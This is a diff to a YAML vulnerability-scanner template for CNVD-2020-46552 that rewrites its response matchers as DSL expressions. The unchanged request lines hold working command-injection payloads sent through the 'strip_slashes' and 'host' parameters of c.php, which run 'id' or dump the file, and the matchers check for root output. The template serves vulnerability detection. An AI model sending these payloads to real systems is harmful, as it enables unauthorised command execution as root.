--- a/cnvd/2020/CNVD-2020-46552.yaml
+++ b/cnvd/2020/CNVD-2020-46552.yaml
@@ -15,21 +15,18 @@ requests:
     path:
       - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=id"
       - "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
-
+        
     matchers-condition: or
     matchers:
-      - type: word
-        part: body
-        words:
-          - "$show_input = function($info)"
-          - "$strip_slashes($host)"
+      - type: dsl
+        dsl:
+          - 'contains(body, "$show_input = function($info)")'
+          - 'contains(body, "$strip_slashes($host)")'
+          - 'status_code == 200'
         condition: and
 
-      - type: word
-        part: body
-        words:
-          - "uid=0(root)"
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'contains(body, "uid=0(root)")'
+          - 'status_code == 200'
+        condition: and
